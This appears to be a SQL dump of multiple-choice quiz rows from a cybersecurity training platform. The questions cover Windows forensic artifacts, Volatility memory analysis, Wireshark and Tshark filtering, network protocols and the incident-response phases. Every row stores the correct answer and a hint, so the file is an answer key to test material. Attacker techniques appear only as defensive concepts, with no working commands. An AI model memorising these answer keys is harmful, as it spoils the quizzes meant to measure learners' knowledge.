(7149, 798, 'If you want to know the exact URL a user clicked on when they fell for a phishing email, which log source is the most useful?', 5, 'Proxy Logs', 0, 'Web gateways track URLs.', '2026-03-09 22:28:54', '[\"Firewall Logs\",\"Proxy Logs\",\"Switch Logs\",\"NetFlow\"]'),
(7150, 799, 'Which physical registry hive file contains the password hashes for local user accounts?', 1, 'SAM', 0, 'Security Account Manager.', '2026-03-09 22:28:54', '[\"SOFTWARE\",\"SAM\",\"SYSTEM\",\"NTUSER.DAT\"]'),
(7151, 799, 'Where is the registry hive file that corresponds to a specific user\'s HKEY_CURRENT_USER (HKCU) located?', 2, 'In their user profile directory', 0, 'It is called NTUSER.DAT.', '2026-03-09 22:28:54', '[\"In their user profile directory\",\"In the Pagefile\",\"C:\\\\Windows\\\\Registry\",\"C:\\\\Windows\\\\System32\\\\config\"]'),
(7152, 799, 'Which registry key tracks the executable programs a user launches from the GUI, keeping count of how many times they were run?', 3, 'UserAssist', 0, 'It assists the user experience.', '2026-03-09 22:28:54', '[\"USBStor\",\"Prefetch\",\"UserAssist\",\"Run\"]'),
(7153, 799, 'What simple encryption method does Windows use to lightly obfuscate the names of programs stored in the UserAssist key?', 4, 'ROT-13', 0, 'A simple letter substitution cipher.', '2026-03-09 22:28:54', '[\"AES-256\",\"Base64\",\"MD5\",\"ROT-13\"]'),
(7154, 799, 'If an attacker wants their malware to survive a system reboot, which category of registry keys are they most likely to modify?', 5, 'Run Keys', 0, 'Keys that auto-start programs.', '2026-03-09 22:28:54', '[\"USBStor\",\"Run Keys\",\"UserAssist\",\"File Associations\"]'),
(7155, 800, 'Which core Windows Event Log tracks successful and failed authentication attempts?', 1, 'Security', 0, 'Only administrators can view it by default.', '2026-03-09 22:28:54', '[\"Setup\",\"System\",\"Security\",\"Application\"]'),
(7156, 800, 'Which Event ID represents a Successful Logon?', 2, '4624', 0, 'Ends in 4.', '2026-03-09 22:28:54', '[\"4625\",\"4720\",\"4624\",\"1102\"]'),
(7157, 800, 'If an attacker uses RDP to remotely access a server, what \"Logon Type\" will be recorded in the Event ID 4624 log?', 3, 'Type 10', 0, 'Remote Interactive logon.', '2026-03-09 22:28:54', '[\"Type 2\",\"Type 7\",\"Type 10\",\"Type 3\"]'),
(7158, 800, 'Which Event ID is generated when a new user account is created on the system?', 4, '4720', 0, 'Account management event.', '2026-03-09 22:28:54', '[\"4720\",\"4672\",\"1102\",\"4688\"]'),
(7159, 800, 'You discover Event ID 1102 in the logs. What action does this explicitly indicate?', 5, 'The logs were cleared', 0, 'A major indicator of anti-forensics.', '2026-03-09 22:28:54', '[\"Malware was installed\",\"The logs were cleared\",\"The system rebooted\",\"A brute force attack succeeded\"]'),
(7160, 801, 'Which Windows feature speeds up application launch times and simultaneously provides forensic analysts with execution counts and timestamps?', 1, 'Prefetch', 0, 'Files ending in .pf.', '2026-03-09 22:28:54', '[\"Amcache\",\"Prefetch\",\"UserAssist\",\"Shimcache\"]'),
(7161, 801, 'Where are Prefetch files stored on a Windows file system?', 2, 'C:\\Windows\\Prefetch', 0, 'Stored in the Windows directory.', '2026-03-09 22:28:54', '[\"They are stored in the Registry\",\"C:\\\\Windows\\\\System32\",\"C:\\\\Users\\\\Public\",\"C:\\\\Windows\\\\Prefetch\"]'),
(7162, 801, 'Which execution artifact is stored as a specific registry key under the SYSTEM hive and is excellent for tracking applications run from removed USB drives?', 3, 'Shimcache', 0, 'Also known as AppCompatCache.', '2026-03-09 22:28:54', '[\"Amcache\",\"Run Keys\",\"Prefetch\",\"Shimcache\"]'),
(7163, 801, 'Which newer execution artifact (Windows 8+) records the actual SHA-1 hash of the executed binary?', 4, 'Amcache', 0, 'Stored as a .hve file.', '2026-03-09 22:28:54', '[\"Prefetch\",\"Shimcache\",\"Event Logs\",\"Amcache\"]'),
(7164, 801, 'True or False: The presence of a file in the Shimcache definitively guarantees that the file was successfully executed by the user.', 5, 'False', 0, 'It can be cached just by exploring the folder.', '2026-03-09 22:28:54', '[\"Only if the file was deleted\",\"False\",\"True\",\"Only on Windows 10\"]'),
(7165, 802, 'What NTFS database file tracks the location and metadata of every single file on the volume?', 1, 'Master File Table', 0, 'Known as $MFT.', '2026-03-09 22:28:54', '[\"Registry\",\"Master Boot Record\",\"Pagefile\",\"Master File Table\"]'),
(7166, 802, 'Which of the MACB timestamps represents the moment a file\'s metadata (like permissions or file name) was altered?', 2, 'MFT Modified', 0, 'The B or fourth timestamp.', '2026-03-09 22:28:54', '[\"Modified\",\"MFT Modified\",\"Created\",\"Accessed\"]'),
(7167, 802, 'What anti-forensics technique involves an attacker deliberately altering the creation or modification timestamps of a file to hide it?', 3, 'Time Stomping', 0, 'Stomping on the MAC times.', '2026-03-09 22:28:54', '[\"Hashing\",\"File Carving\",\"Time Stomping\",\"Steganography\"]'),
(7168, 802, 'Even if a USB drive is removed, which automatically created Windows artifact can reveal the Volume Serial Number of that USB and the original path of the files opened from it?', 4, 'LNK files', 0, 'Shortcut files.', '2026-03-09 22:28:54', '[\"Recycle Bin\",\"Amcache\",\"LNK files\",\"Prefetch\"]'),
(7169, 802, 'When a file is sent to the Windows Recycle Bin, it is split into a $R file (the contents) and an $I file. What information does the $I file contain?', 5, 'Original path and deletion time', 0, 'It holds the metadata of the deletion.', '2026-03-09 22:28:54', '[\"Original path and deletion time\",\"The user password\",\"Decryption keys\",\"The file hash\"]'),
(7170, 803, 'Which open-source framework, written in Python, is considered the industry standard for analyzing RAM dumps?', 1, 'Volatility', 0, 'It analyzes volatile memory.', '2026-03-09 22:28:54', '[\"Wireshark\",\"Autopsy\",\"EnCase\",\"Volatility\"]'),
(7171, 803, 'In Volatility 2, what piece of information must an analyst manually specify so the tool understands how to parse the OS structures?', 2, 'The Profile', 0, 'E.g., Win7SP1x64.', '2026-03-09 22:28:54', '[\"The Password\",\"The Malware Hash\",\"The IP Address\",\"The Profile\"]'),
(7172, 803, 'What command line flag is used in Volatility 3 to specify the input file (the memory image)?', 3, '-f', 0, 'Stands for file.', '2026-03-09 22:28:54', '[\"-p\",\"-i\",\"-m\",\"-f\"]'),
(7173, 803, 'What is the name of a specific script in Volatility that looks for an exact type of artifact (e.g., hidden processes)?', 4, 'Plugin', 0, 'You plug it into the framework.', '2026-03-09 22:28:54', '[\"Add-on\",\"Plugin\",\"Module\",\"Extension\"]'),
(7174, 803, 'Which Volatility 3 plugin should be run first to gather basic OS build information and the exact UTC timestamp of the memory acquisition?', 5, 'windows.info', 0, 'It provides information about the Windows build.', '2026-03-09 22:28:54', '[\"windows.netstat\",\"windows.malfind\",\"windows.info\",\"windows.pslist\"]'),
(7175, 804, 'Which Volatility plugin relies on the OS-maintained linked list (ActiveProcessLinks) to show currently running processes, making it vulnerable to rootkits?', 1, 'windows.pslist', 0, 'It just lists what the OS sees.', '2026-03-09 22:28:54', '[\"windows.pstree\",\"windows.psscan\",\"windows.pslist\",\"windows.malfind\"]'),
(7176, 804, 'What technique does a rootkit use to hide a malicious process from the Task Manager and the pslist command?', 2, 'Direct Kernel Object Manipulation (Unlinking)', 0, 'It alters the ActiveProcessLinks.', '2026-03-09 22:28:54', '[\"Encryption\",\"Direct Kernel Object Manipulation (Unlinking)\",\"Code Injection\",\"Obfuscation\"]'),
(7177, 804, 'Which Volatility plugin ignores the OS list and scans every byte of memory for specific data structures, allowing it to find hidden and recently terminated processes?', 3, 'windows.psscan', 0, 'It scans for signatures.', '2026-03-09 22:28:54', '[\"windows.netscan\",\"windows.pslist\",\"windows.pstree\",\"windows.psscan\"]'),
(7178, 804, 'If you see a process listed in the output of psscan, but that exact same PID is missing from the output of pslist, what is the most likely explanation?', 4, 'The process was deliberately hidden (Rootkit)', 0, 'It was unlinked from the main list.', '2026-03-09 22:28:54', '[\"The process crashed\",\"The process requires administrator rights\",\"Volatility has a bug\",\"The process was deliberately hidden (Rootkit)\"]'),
(7179, 804, 'Which plugin is best for spotting anomalies like Microsoft Word spawning a Command Prompt by visualizing parent-child process relationships?', 5, 'windows.pstree', 0, 'Shows the family tree.', '2026-03-09 22:28:54', '[\"windows.pslist\",\"windows.psscan\",\"windows.pstree\",\"windows.info\"]'),
(7180, 805, 'Which Volatility plugin is used to find active, listening, and recently closed network connections within a memory image?', 1, 'windows.netscan', 0, 'Scans for network artifacts.', '2026-03-09 22:28:54', '[\"windows.psscan\",\"windows.netstat\",\"windows.cmdline\",\"windows.netscan\"]'),
(7181, 805, 'If you find a suspicious external IP address using windows.netscan, what field in the output tells you exactly which program on the computer opened the connection?', 2, 'Owner (PID)', 0, 'The Process ID involved.', '2026-03-09 22:28:54', '[\"Protocol\",\"State\",\"Local Port\",\"Owner (PID)\"]'),
(7182, 805, 'Which plugin displays the exact arguments and flags that were passed to an executable when it was launched?', 3, 'windows.cmdline', 0, 'Command Line.', '2026-03-09 22:28:54', '[\"windows.psscan\",\"windows.pslist\",\"windows.cmdline\",\"windows.info\"]'),
(7183, 805, 'An attacker launches PowerShell with the `-e` flag followed by a long string of random-looking characters. What encryption/encoding method is this primarily indicating?', 4, 'Base64', 0, 'Powershell EncodedCommand uses this.', '2026-03-09 22:28:54', '[\"MD5\",\"Base64\",\"ROT-13\",\"AES\"]'),
(7184, 805, 'Using built-in, legitimate IT administrator tools (like certutil or powershell) to download malware and avoid antivirus detection is known as what kind of attack?', 5, 'Living off the Land (LotL)', 0, 'Using what is already there.', '2026-03-09 22:28:54', '[\"Ransomware\",\"Zero-Day Exploit\",\"Buffer Overflow\",\"Living off the Land (LotL)\"]'),
(7185, 806, 'What technique does an attacker use to hide malicious, executing code inside the memory space of a legitimate Windows process (like explorer.exe)?', 1, 'Code Injection', 0, 'Injecting into another process.', '2026-03-09 22:28:54', '[\"Time Stomping\",\"Port Knocking\",\"Code Injection\",\"Phishing\"]'),
(7186, 806, 'In Windows memory protection rules (VAD), which permission state is considered highly dangerous and indicative of malicious injection?', 2, 'PAGE_EXECUTE_READWRITE (RWX)', 0, 'It allows writing and running code simultaneously.', '2026-03-09 22:28:54', '[\"PAGE_EXECUTE_READWRITE (RWX)\",\"PAGE_EXECUTE\",\"PAGE_READWRITE\",\"PAGE_READONLY\"]'),
(7187, 806, 'Which Volatility plugin is specifically designed to hunt for code injection by scanning all processes for hidden RWX memory regions?', 3, 'windows.malfind', 0, 'Finds malware.', '2026-03-09 22:28:54', '[\"windows.netscan\",\"windows.malfind\",\"windows.psscan\",\"windows.pslist\"]'),
(7188, 806, 'When viewing the hex dump output of malfind, what two bytes (in hex) represent the \"magic bytes\" header of a Windows Executable file?', 4, '4D 5A', 0, 'Translates to ASCII MZ.', '2026-03-09 22:28:54', '[\"4D 5A\",\"50 4B\",\"FF D8\",\"89 50\"]'),
(7189, 806, 'Once you have identified the PID of an injected process using malfind, what Volatility flag allows you to extract the malicious code out of the RAM image and save it to your hard drive?', 5, '--dump', 0, 'Dumps the file.', '2026-03-09 22:28:54', '[\"--export\",\"--extract\",\"--save\",\"--dump\"]'),
(7190, 807, 'What is the standard file extension used to store a byte-for-byte recording of entire network packets?', 1, '.pcap', 0, 'Packet Capture.', '2026-03-09 22:28:54', '[\".evt\",\".log\",\".pcap\",\".ps1\"]'),
(7191, 807, 'Which of the following acts like a \"phone bill,\" recording metadata about a connection (who, when, how long) but NOT the actual data payload?', 2, 'NetFlow', 0, 'It records the flow of the network.', '2026-03-09 22:28:54', '[\"PCAP\",\"Syslog\",\"EventTracer\",\"NetFlow\"]'),
(7192, 807, 'To capture all traffic on a network segment, what mode must a network interface card (NIC) be placed into?', 3, 'Promiscuous Mode', 0, 'It reads every packet it sees.', '2026-03-09 22:28:54', '[\"Stealth Mode\",\"Monitor Mode\",\"Promiscuous Mode\",\"Injektion Mode\"]'),
(7193, 807, 'Which popular command-line tool, common on Linux environments, is frequently used to capture packets and write them to a PCAP file?', 4, 'tcpdump', 0, 'Dumps TCP traffic.', '2026-03-09 22:28:54', '[\"tcpdump\",\"ping\",\"netstat\",\"nmap\"]'),
(7194, 807, 'Why is network forensics often considered more reliable than host-based forensics (like checking event logs)?', 5, 'Network sensors are harder for malware to bypass or erase', 0, 'Packets don\'t lie, and they are usually stored off the infected host.', '2026-03-09 22:28:54', '[\"Network sensors are harder for malware to bypass or erase\",\"It is faster to analyze\",\"It uses less disk space\",\"It is encrypted by default\"]'),
(7195, 808, 'In Wireshark\'s three-pane interface, which pane allows you to expand and inspect the specific headers of the OSI model layers (like the IPv4 or TCP headers)?', 1, 'Packet Details (Middle)', 0, 'It breaks down the details.', '2026-03-09 22:28:54', '[\"Packet Bytes (Bottom)\",\"Packet List (Top)\",\"Packet Details (Middle)\",\"Filter Bar\"]'),
(7196, 808, 'What is the exact Wireshark display filter syntax to show only packets where the source IP is 8.8.8.8?', 2, 'ip.src == 8.8.8.8', 0, 'Remember the double equals sign.', '2026-03-09 22:28:54', '[\"source_ip = 8.8.8.8\",\"ip.addr == 8.8.8.8\",\"ip.src == 8.8.8.8\",\"ip:src=8.8.8.8\"]'),
(7197, 808, 'Which display filter would you use to find instances where a user uploaded data or submitted a form to an unencrypted web server?', 3, 'http.request.method == \"POST\"', 0, 'Looking for the HTTP POST method.', '2026-03-09 22:28:54', '[\"ftp.request == \\\"UPLOAD\\\"\",\"http.request.method == \\\"POST\\\"\",\"http.response == 200\",\"tcp.port == 80\"]'),
(7198, 808, 'What powerful Wireshark feature automatically reassembles dozens of fragmented packets into a single, readable conversation window?', 4, 'Follow TCP Stream', 0, 'It follows the entire flow of the stream.', '2026-03-09 22:28:54', '[\"Expert Info\",\"Protocol Hierarchy\",\"Resolve IPs\",\"Follow TCP Stream\"]'),
(7199, 808, 'What does the Boolean operator `&&` do when combining display filters in Wireshark?', 5, 'Logical AND (Both conditions must be true)', 0, 'It restricts the search.', '2026-03-09 22:28:54', '[\"Logical NOT\",\"Logical AND (Both conditions must be true)\",\"Concatenation\",\"Logical OR\"]'),
(7200, 809, 'Which network protocol essentially acts as the \"phonebook of the internet,\" resolving domain names into IP addresses, and operates on UDP port 53?', 1, 'DNS', 0, 'Domain Name System.', '2026-03-09 22:28:54', '[\"HTTP\",\"DNS\",\"FTP\",\"SSH\"]'),
(7201, 809, 'An infected machine generates hundreds of DNS requests per minute for random, nonsensical domains like \"kjxqzwp.info\". What technique is the malware likely using?', 2, 'Domain Generation Algorithm (DGA)', 0, 'It generates domains programmatically.', '2026-03-09 22:28:54', '[\"Fast Fluxing\",\"ARP Spoofing\",\"DNS Tunneling\",\"Domain Generation Algorithm (DGA)\"]'),
(7202, 809, 'In an HTTP request, which key header field indicates the type of browser or client software making the request, and is often a dead giveaway for automated malware scripts?', 3, 'User-Agent', 0, 'Tells the server the \"agent\" of the user.', '2026-03-09 22:28:54', '[\"Referer\",\"Host\",\"User-Agent\",\"Accept-Encoding\"]'),
(7203, 809, 'If you see an HTTP response code of \"200 OK\" immediately following an HTTP GET request for \"malware.exe\", what does this indicate?', 4, 'The malware download was successful', 0, '200 means success.', '2026-03-09 22:28:54', '[\"The server blocked the download\",\"The malware download was successful\",\"The file was not found\",\"The client timed out\"]'),
(7204, 809, 'What Wireshark feature allows you to quickly rebuild and extract files (like images, scripts, or executables) that were transmitted over unencrypted HTTP traffic?', 5, 'File -> Export Objects -> HTTP', 0, 'You export the object from the protocol.', '2026-03-09 22:28:54', '[\"File -> Export Objects -> HTTP\",\"Statistics -> Protocol Hierarchy\",\"Edit -> Reassemble Payload\",\"Analyze -> Decode As\"]'),
(7205, 810, 'What command-line tool provides the exact same parsing capabilities as Wireshark but is vastly superior for analyzing massive PCAP files and scripting?', 1, 'Tshark', 0, 'The terminal version of Wireshark.', '2026-03-09 22:28:54', '[\"Tshark\",\"tcpdump\",\"Zeek\",\"Snort\"]'),
(7206, 810, 'In Tshark, what command line flag is used to apply a Wireshark-style display filter (e.g., to filter for \"http\")?', 2, '-Y', 0, 'Capital Y.', '2026-03-09 22:28:54', '[\"-Y\",\"-f\",\"-d\",\"-R\"]'),
(7207, 810, 'When you want Tshark to output specific columns of data rather than the entire packet summary, what output format flag must you use?', 3, '-T fields', 0, 'Specifies the output format as fields.', '2026-03-09 22:28:54', '[\"-T fields\",\"-T json\",\"-x fields\",\"-o columns\"]'),
(7208, 810, 'Which flag is used in conjunction with \"-T fields\" to actually specify the name of the specific field you want to extract (e.g., ip.src)?', 4, '-e', 0, 'Extract this field.', '2026-03-09 22:28:54', '[\"-c\",\"-f\",\"-x\",\"-e\"]'),
(7209, 810, 'Why would an analyst pipe the output of Tshark into the Bash commands `sort | uniq -c | sort -nr` ?', 5, 'To count and find the most frequent occurrences (like top talkers)', 0, 'A classic bash one-liner for frequency analysis.', '2026-03-09 22:28:54', '[\"To count and find the most frequent occurrences (like top talkers)\",\"To extract an executable\",\"To safely delete the PCAP\",\"To encrypt the output log\"]'),
(7210, 811, 'What does the acronym PICERL stand for in the context of Incident Response?', 1, 'Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned', 0, 'The 6 phases of IR.', '2026-03-09 22:28:54', '[\"Planning, Incident, Control, Eradicate, Restore, Listen\",\"Proactive, Identification, Correction, Eviction, Recovery, Legal\",\"Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned\",\"Prevention, Investigation, Containment, Evaluation, Recovery, Logging\"]'),
(7211, 811, 'Which phase of the PICERL methodology involves developing standard operating procedures (Playbooks) and conducting tabletop exercises?', 2, 'Preparation', 0, 'Done before the attack.', '2026-03-09 22:28:54', '[\"Lessons Learned\",\"Preparation\",\"Identification\",\"Eradication\"]'),
(7212, 811, 'A firewall blocking a port scan from the internet is considered a routine network ________, whereas an attacker successfully bypassing the firewall and stealing data is a security ________.', 3, 'Event / Incident', 0, 'One is normal, one is a breach of policy.', '2026-03-09 22:28:54', '[\"Log / Disaster\",\"Breach / Alert\",\"Incident / Event\",\"Event / Incident\"]'),
(7213, 811, 'Malicious IP addresses, known bad file hashes, and attacker domain names are collectively referred to as what?', 4, 'Indicators of Compromise (IoCs)', 0, 'Evidence of an attack.', '2026-03-09 22:28:54', '[\"Exploits\",\"Indicators of Compromise (IoCs)\",\"Signatures\",\"Vulnerabilities\"]'),
(7214, 811, 'During the Identification phase, what is the process of determining exactly how many systems an attacker has compromised?', 5, 'Scoping', 0, 'Figuring out how wide the breach is.', '2026-03-09 22:28:54', '[\"Scoping\",\"Eradication\",\"Triaging\",\"Forensics\"]'),
(7215, 812, 'What is the primary objective of the Containment phase in Incident Response?', 1, 'To stop the spread of the attack and prevent further damage', 0, 'Stopping the bleeding.', '2026-03-09 22:28:54', '[\"To identify the attacker\",\"To write the final report\",\"To restore backups\",\"To stop the spread of the attack and prevent further damage\"]'),
(7216, 812, 'Quickly disconnecting an infected server to stop an active data breach is an example of what containment strategy?', 2, 'Immediate Containment', 0, 'Pulling the plug.', '2026-03-09 22:28:54', '[\"Immediate Containment\",\"Delayed Containment\",\"Eradication\",\"Scoping\"]'),
(7217, 812, 'What is the major risk of using the \"Delayed Containment\" strategy (watching the attacker)?', 3, 'The attacker might steal data or deploy ransomware while you are watching', 0, 'It is a high-risk gamble.', '2026-03-09 22:28:54', '[\"You might lose your job\",\"The SIEM might run out of storage\",\"The attacker might steal data or deploy ransomware while you are watching\",\"The firewall will crash\"]'),
(7218, 812, 'Why is \"pulling the power plug\" out of the wall generally considered a bad containment strategy for traditional forensics?', 4, 'It destroys volatile evidence stored in RAM', 0, 'RAM is erased without power.', '2026-03-09 22:28:54', '[\"It causes a power surge\",\"It encrypts the disk\",\"It breaks the hard drive\",\"It destroys volatile evidence stored in RAM\"]'),
(7219, 812, 'Using an EDR agent to logically cut off a compromised laptop\'s access to the internet and internal network, while keeping it powered on for forensics, is called what?', 5, 'Endpoint Isolation', 0, 'Quarantining the endpoint.', '2026-03-09 22:28:54', '[\"Network Segmentation\",\"Sinkholing\",\"Endpoint Isolation\",\"Port Security\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(7220, 813, 'In the PICERL methodology, which phase involves the actual deletion of malware, removing persistent backdoors, and patching the initial vulnerability?', 1, 'Eradication', 0, 'Removing the root cause.', '2026-03-09 22:28:54', '[\"Identification\",\"Containment\",\"Eradication\",\"Recovery\"]'),
(7221, 813, 'Why is simply deleting a known malicious file often considered an insufficient eradication strategy against advanced attackers?', 2, 'They likely have hidden persistent backdoors elsewhere on the system', 0, 'Whack-a-mole doesn\'t work.', '2026-03-09 22:28:54', '[\"Antivirus will block the deletion\",\"The file will just redownload itself from Microsoft\",\"The file is usually too large\",\"They likely have hidden persistent backdoors elsewhere on the system\"]'),
(7222, 813, 'What is the industry-standard, most secure method for eradicating a severe malware infection from a host?', 3, 'Wiping the hard drive and reinstalling the OS from a clean image', 0, 'When in doubt, wipe it out.', '2026-03-09 22:28:54', '[\"Uninstalling the web browser\",\"Wiping the hard drive and reinstalling the OS from a clean image\",\"Deleting the registry cache\",\"Running three different Antivirus scans\"]'),
(7223, 813, 'During the Recovery phase, what is the primary source used to bring data back online if a server was destroyed by ransomware?', 4, 'Secure, offline backups', 0, 'Data restoration source.', '2026-03-09 22:28:54', '[\"Secure, offline backups\",\"Volume Shadow Copies\",\"Cloud Storage Logs\",\"The Master File Table\"]'),
(7224, 813, 'Immediately after a compromised system is cleaned and placed back onto the production network, what action must the Security Operations Center (SOC) take?', 5, 'Implement enhanced monitoring on that system to ensure the attacker doesn\'t return', 0, 'Watch it closely.', '2026-03-09 22:28:54', '[\"Downgrade the EDR software\",\"Turn off the firewall\",\"Implement enhanced monitoring on that system to ensure the attacker doesn\'t return\",\"Format the hard drive again\"]'),
(7225, 814, 'Which phase of the PICERL methodology is often skipped but is vital for improving organizational security posture against future attacks?', 1, 'Lessons Learned', 0, 'The final phase.', '2026-03-09 22:28:54', '[\"Recovery\",\"Preparation\",\"Lessons Learned\",\"Containment\"]'),
(7226, 814, 'What critical document must the Incident Response team produce shortly after the incident is concluded?', 2, 'The Post-Incident Report', 0, 'Details the timeline and root cause.', '2026-03-09 22:28:54', '[\"The SLA Agreement\",\"The Firewall Ruleset\",\"The Post-Incident Report\",\"The Eradication Statement\"]'),
(7227, 814, 'Determining exactly how the attacker gained initial access to the network (e.g., finding the specific employee who clicked a phishing link) is known as what?', 3, 'Root Cause Analysis', 0, 'Finding \"Patient Zero\".', '2026-03-09 22:28:54', '[\"Root Cause Analysis\",\"Scoping\",\"Triaging\",\"Threat Hunting\"]'),
(7228, 814, 'During the Post-Mortem meeting, the team discusses a failure: it took 12 hours to notice a critical alert. What is the most appropriate actionable change to implement?', 4, 'Tuning the SIEM to make critical alerts more visible and retraining the SOC analysts', 0, 'Fix the process that failed.', '2026-03-09 22:28:54', '[\"Buying a new brand of firewall\",\"Tuning the SIEM to make critical alerts more visible and retraining the SOC analysts\",\"Firing the IT Director\",\"Doing nothing\"]'),
(7229, 814, 'The output and action items from the \"Lessons Learned\" phase feed directly into which other phase of the PICERL methodology, creating a continuous improvement cycle?', 5, 'Preparation', 0, 'It feeds back to the beginning.', '2026-03-09 22:28:54', '[\"Identification\",\"Preparation\",\"Containment\",\"Eradication\"]'),
(7230, 815, 'How many layers are in the theoretical OSI model?', 1, '7', 0, 'It is a 7-layer model.', '2026-03-09 22:28:55', '[\"5\",\"4\",\"7\",\"9\"]'),
(7231, 815, 'Which OSI layer is responsible for logical IP addressing and routing packets between different networks?', 2, 'Layer 3: Network', 0, 'Routers live here.', '2026-03-09 22:28:55', '[\"Layer 2: Data Link\",\"Layer 3: Network\",\"Layer 7: Application\",\"Layer 4: Transport\"]'),
(7232, 815, 'TCP and UDP, along with port numbers, operate at which layer of the OSI model?', 3, 'Layer 4: Transport', 0, 'This layer handles end-to-end transport.', '2026-03-09 22:28:55', '[\"Layer 2\",\"Layer 3\",\"Layer 4: Transport\",\"Layer 5\"]'),
(7233, 815, 'The process of a higher-layer protocol adding its own header to the payload received from the layer above it, as data moves down the OSI stack, is called what?', 4, 'Encapsulation', 0, 'Putting the data inside a capsule (header).', '2026-03-09 22:28:55', '[\"Routing\",\"De-encapsulation\",\"Encapsulation\",\"Segmentation\"]'),
(7234, 815, 'In the simplified TCP/IP model, which single layer combines the functions of the OSI model\'s Session, Presentation, and Application layers?', 5, 'Application Layer', 0, 'The top layer of TCP/IP.', '2026-03-09 22:28:55', '[\"Transport Layer\",\"Network Access Layer\",\"Internet Layer\",\"Application Layer\"]'),
(7235, 816, 'Which transport layer protocol requires a \"3-Way Handshake\" to establish a connection before any actual data is transmitted?', 1, 'TCP', 0, 'Transmission Control Protocol.', '2026-03-09 22:28:55', '[\"TCP\",\"ICMP\",\"IP\",\"UDP\"]'),
(7236, 816, 'What are the three steps, in order, of the TCP 3-Way Handshake?', 2, 'SYN, SYN-ACK, ACK', 0, 'Synchronize, Synchronize-Acknowledge, Acknowledge.', '2026-03-09 22:28:55', '[\"ACK, SYN, SYN-ACK\",\"SYN, SYN-ACK, ACK\",\"SYN, ACK, FIN\",\"REQ, RES, ACK\"]'),
(7237, 816, 'Which protocol is connectionless, \"fire and forget\", and does not guarantee delivery of packets?', 3, 'UDP', 0, 'User Datagram Protocol.', '2026-03-09 22:28:55', '[\"SSH\",\"TCP\",\"UDP\",\"FTP\"]'),
(7238, 816, 'Which of the following applications would primarily rely on UDP for its communication?', 4, 'Live VoIP Phone Call', 0, 'Speed over reliability.', '2026-03-09 22:28:55', '[\"Downloading a ZIP file\",\"Sending an Email\",\"Live VoIP Phone Call\",\"Loading a Webpage\"]'),
(7239, 816, 'What is the term for the numerical identifier (ranging from 1 to 65535) used at Layer 4 to ensure incoming data is routed to the correct specific application running on a server?', 5, 'Port Number', 0, 'Like an apartment number in a building.', '2026-03-09 22:28:55', '[\"IP Address\",\"Port Number\",\"Socket\",\"MAC Address\"]'),
(7240, 817, 'Which protocol translates human-readable domain names like \"google.com\" into IP addresses?', 1, 'DNS', 0, 'Domain Name System.', '2026-03-09 22:28:55', '[\"DHCP\",\"HTTP\",\"ARP\",\"DNS\"]'),
(7241, 817, 'Which protocol is responsible for automatically distributing IP addresses and network configurations to laptops and phones connecting to a Wi-Fi network?', 2, 'DHCP', 0, 'Dynamic Host Configuration Protocol.', '2026-03-09 22:28:55', '[\"ICMP\",\"BGP\",\"DHCP\",\"DNS\"]'),
(7242, 817, 'If an attacker wants to perform a local Man-in-the-Middle attack by tricking a victim computer into believing the attacker\'s MAC address actually belongs to the Default Gateway, what protocol are they abusing?', 3, 'ARP', 0, 'Address Resolution Protocol.', '2026-03-09 22:28:55', '[\"ARP\",\"ICMP\",\"TCP\",\"DNS\"]'),
(7243, 817, 'The \"ping\" command line utility utilizes which Layer 3 diagnostic protocol to determine if a remote server is online?', 4, 'ICMP', 0, 'Internet Control Message Protocol.', '2026-03-09 22:28:55', '[\"TCP\",\"IGMP\",\"UDP\",\"ICMP\"]'),
(7244, 817, 'Why do modern malware developers primarily design their Command and Control (C2) communication to use HTTPS (TCP port 443)?', 5, 'To blend in with normal web traffic and bypass restrictive corporate firewalls', 0, 'It looks like regular encrypted browsing.', '2026-03-09 22:28:55', '[\"Because it is the fastest protocol available\",\"Because HTTPS traffic is not recorded by ISPs\",\"To blend in with normal web traffic and bypass restrictive corporate firewalls\",\"Because UDP is unreliable\"]'),
(7245, 818, 'In the Wireshark GUI, which pane displays the raw hexadecimal and ASCII representation of the packet?', 1, 'Packet Bytes Pane (Bottom)', 0, 'The lowest pane shows the rawest data.', '2026-03-09 22:28:55', '[\"Filter Pane\",\"Packet Details Pane (Middle)\",\"Packet List Pane (Top)\",\"Packet Bytes Pane (Bottom)\"]'),
(7246, 818, 'Which Wireshark pane allows you to expand protocol headers layer by layer (e.g., expanding the IPv4 header to see the TTL value)?', 2, 'Packet Details Pane (Middle)', 0, 'It breaks down the details of the protocol.', '2026-03-09 22:28:55', '[\"Packet Details Pane (Middle)\",\"Packet List Pane (Top)\",\"Packet Bytes Pane (Bottom)\",\"Status Bar\"]'),
(7247, 818, 'By default, what does the \"Time\" column in the Packet List pane display?', 3, 'Seconds since the beginning of the capture', 0, 'It is relative time by default.', '2026-03-09 22:28:55', '[\"Seconds since the beginning of the capture\",\"Remaining time until the capture ends\",\"The actual Time of Day (e.g., 14:00:00)\",\"Milliseconds since the computer booted\"]'),
(7248, 818, 'If you want to quickly organize the Packet List pane to show the largest packets at the top, what action should you take?', 4, 'Click on the \"Length\" column header to sort', 0, 'Sorting by columns.', '2026-03-09 22:28:55', '[\"Use the Find feature (Ctrl+F)\",\"Click on the \\\"Length\\\" column header to sort\",\"Write a complex display filter\",\"Change the Color Rules\"]'),
(7249, 818, 'In Wireshark\'s default color scheme, what do packets colored with black backgrounds and bright red text typically indicate?', 5, 'Errors, warnings, or bad checksums (like TCP Retransmissions)', 0, 'Red usually means bad news or errors.', '2026-03-09 22:28:55', '[\"Normal HTTP Web Traffic\",\"Encrypted SSH traffic\",\"Errors, warnings, or bad checksums (like TCP Retransmissions)\",\"Successfully established connections\"]'),
(7250, 819, 'What is the fundamental difference between a Capture Filter and a Display Filter in Wireshark?', 1, 'Capture filters determine what is saved to disk; Display filters hide/show data already saved', 0, 'One records, the other views.', '2026-03-09 22:28:55', '[\"Capture filters are applied after recording; Display filters are applied before\",\"Capture filters only work on Linux; Display filters only work on Windows\",\"Capture filters determine what is saved to disk; Display filters hide/show data already saved\",\"There is no difference, they are the same thing\"]'),
(7251, 819, 'Which display filter correctly shows traffic where the source IP address is exactly 10.0.0.100?', 2, 'ip.src == 10.0.0.100', 0, 'Remember the double equals and .src notation.', '2026-03-09 22:28:55', '[\"ip.addr = 10.0.0.100\",\"source_ip == 10.0.0.100\",\"ip_src := 10.0.0.100\",\"ip.src == 10.0.0.100\"]'),
